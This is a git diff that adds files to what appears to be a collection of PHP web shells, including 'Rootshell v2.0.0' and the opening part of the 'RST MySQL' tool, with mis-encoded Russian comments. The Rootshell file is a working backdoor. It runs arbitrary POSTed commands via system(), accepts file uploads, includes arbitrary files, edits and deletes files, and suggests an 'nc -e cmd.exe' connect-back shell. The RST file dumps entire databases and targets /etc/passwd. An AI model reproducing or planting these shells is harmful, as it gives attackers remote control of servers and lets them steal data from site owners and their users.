+oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKSkrJzsnK0
+1hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u8eXy6
+PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0v
+TGl2ZUludGVybmV0LS0+");
+
+/* -------------------------[ EOF ]------------------------- */
+
+?>
diff --git a/xakep-shells/PHP/rootshell.php.txt b/xakep-shells/PHP/rootshell.php.txt
new file mode 100644
index 0000000..202d779
--- /dev/null
+++ b/xakep-shells/PHP/rootshell.php.txt
@@ -0,0 +1,349 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*    1.3.3          666            added "File Editor"
+/*    2.0.0          666            added "Notices"
+/*    2.0.0          666            added some new modules
+/*    2.0.0          666            made some design updates
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "shells.dl.am";                                                      // Insert your nick
+$version      = "2.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
+} else {
+   print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center">
+      <br>
+<div align="center" style="overflow:auto; width:99%; height:175">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
+}
+closedir($folder);
+?>
+</div><p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center"><?
+$scriptname = $_SERVER['SCRIPT_NAME'];
+$filename = $_POST["filename"];
+
+if($_POST["submit"] == "Open")
+{
+	if(file_exists($filename))
+	{
+		$filecontents = htmlentities(file_get_contents($filename));
+
+		if(!$filecontents)
+			$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}		
+else if($_POST["submit"] == "Delete")
+{
+	if(file_exists($filename))
+	{
+		if(unlink($filename))	
+			$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
+		else
+			$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}
+else if($_POST["submit"] == "Save")
+{
+	$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
+
+	if(file_exists($filename))
+		unlink($filename);
+
+	$handle = fopen($filename, "w");
+
+	if(!$handle)
+		$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
+	else
+	{
+		if(!fwrite($handle, $filecontents))
+			$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
+
+		fclose($handle);
+	}
+
+	$filecontents = htmlentities($filecontents);
+}
+else
+{
+	$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
+}
+?>
+<table border="0" align="center">
+		
+		<tr>
+			<td>
+				<table width="100%" border="0">
+				<tr>
+					<td>
+						<form method="post" action="<?echo $scriptname;?>">
+							<input name="filename" type="text" value="<?echo $filename;?>" size="20">
+							<input type="submit" name="submit" value="Open">
+							<input type="submit" name="submit" value="Delete">
+					</td>
+				</tr>
+				</table>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+					<font face="Verdana" style="font-size: 11pt">
+					<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
+					<input type="submit" name="submit" value="Save">
+					<input type="reset" value="Reset">
+				</form>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+				<h2><?echo $status;?></h2>
+			</td>
+		</tr>
+		</table>				</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+<textarea rows="13" cols="55"></textarea><br>
+      &nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.org">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div>
\ No newline at end of file
diff --git a/xakep-shells/PHP/rst_sql.php.php.txt b/xakep-shells/PHP/rst_sql.php.php.txt
new file mode 100644
index 0000000..c26a3c4
--- /dev/null
+++ b/xakep-shells/PHP/rst_sql.php.php.txt
@@ -0,0 +1,1694 @@
+<?php
+error_reporting(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@set_magic_quotes_runtime(0); //èçáàâèòüñÿ îò ñëåøåé ïðè ïîëó÷åíèè äàííûõ èç ôàéëà
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+if(!ini_get("register_globals")){ 
+import_request_variables("GPC"); 
+}
+//Åñëè php äîáàâèë ñëåøè, èçáàâèòüñÿ îò íèõ.Ñëåøè áóäóò óäàëåíû êàê èç ãëîáàëüíûõ 
+//ìàññèâîâ, òàê è èç âñåõ ïåðåìåííûõ, êîòîðûå îáðàçóþòñÿ ïðè register_globals=on
+if (get_magic_quotes_gpc()) strips($GLOBALS);
+function strips(&$el) { 
+  if (is_array($el)) { 
+    foreach($el as $k=>$v) { 
+      if($k!='GLOBALS') { 
+        strips($el[$k]); 
+      } 
+    } 
+  } else { 
+    $el = stripslashes($el); 
+  } 
+}
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+    $file = "C:\\tmp\\dump_".$db.".sql";
+    $p_v=$SystemRoot."\my.ini";
+    $os="win";
+} else {
+    $file = "/tmp/dump_".$db.".sql"; 
+    $p_v="/etc/passwd";
+}
+if ($HTTP_GET_VARS['send']=='send_http') {
+function download($file, $type = false, $name = false, $down = false) { 
+if(!file_exists($file)) exit; 
+if(!$name) $name = basename($file); 
+if($down) $type = "application/force-download"; 
+else if(!$type) $type = "application/download"; 
+$disp = $down ? "attachment" : "inline";
+header("Content-disposition: ".$disp."; filename=".$name); 
+header("Content-length: ".filesize($file)); 
+header("Content-type: ".$type); 
+header("Connection: close"); 
+header("Expires: 0");
+set_time_limit(0); 
+readfile($file); 
+unlink($file);
+exit; 
+} 
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if (sizeof($tabs) == 0) { 
+      // ïîëó÷àåì ñïèñîê òàáëèö áàçû 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");        
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+}
+if ($HTTP_GET_VARS['strukt']=='t_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+   fclose($fp); 
+}
+download($f_dump);
+}
+function send_header() {
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+}
+if ($HTTP_GET_VARS['img']=='st_form_bg') {
+   $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
+   send_header();
+   echo base64_decode($st_form_bg);
+}
+if ($HTTP_GET_VARS['img']=='bg_f') {
+$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
+      'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
+      'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
+   send_header();
+   echo base64_decode($bg_f);
+}
+if ($HTTP_GET_VARS['img']=='b_close') {
+$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
+         'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
+         'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
+         'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
+         'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
+         '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+         'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
+         'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
+         'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
+         'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
+         'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
+         'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
+         '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
+         'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
+         'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
+         'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
+         'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
+         'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
+         'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
+         'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
+   send_header();
+   echo base64_decode($b_close);
+} 
+$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
+$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Îøèáêà â çàïðîñå:</b><tr><td align=center><br><h5>";
+$f_error="</h5></td></tr></table>
+<CENTER><FORM><INPUT type=\"button\" value=\"   << Íàçàä    \" onClick=\"history.go(-1)\"><BR>
+</FORM></CENTER>
+</td></tr></table></td></tr></table>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+ print "
+  <html><HEAD><TITLE>RST MySQL</TITLE>
+
+  <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
+   <style>
+   td {  
+   font-family: verdana, arial, ms sans serif, sans-serif;  
+   font-size: 11px;  
+   color: #000000; 
+   }
+   BODY {
+   margin-top: 4px; 
+   margin-right: 4px; 
+   margin-bottom: 4px; 
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393; 
+   scrollbar-3dlight-color: #000000; 
+   scrollbar-darkshadow-color: #101842; 
+   scrollbar-shadow-color: #ffffff; 
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff; 
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></HEAD><BODY>";
+
+
+if ($sapi_type == "cgi") {
+    $php_type="CGI";
+} else {
+    $php_type="ìîäóëü";
+}
+
+$form_file="
+        <table width=80% align=center border=0>
+        <tr><td align=center>×òåíèå&nbsp;ïðîèçâîëüíîãî&nbsp;ôàéëà,&nbsp;ñåðâåðà&nbsp;(&nbsp;<b>$server</b>&nbsp;)</td></tr>
+        <tr><td>
+        <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
+        <tr bgcolor=#DBDCDD><td align=center>
+        Ïðè óñëîâèè, ÷òî ôàéë äîñòóïåí äëÿ <b>÷òåíèÿ</b> è ïðè
+        íàëè÷èè ó ïîëüçîâàòåëÿ ïðèâèëåãèè <b>FILE</b>, <b>SELECT</b>,
+        <b>CREATE</b>, ïðàâèëüíîì ïóòè è èìåíè - âîçìîæíî ÷òåíèå ïðîèçâîëüíîãî ôàéëà.
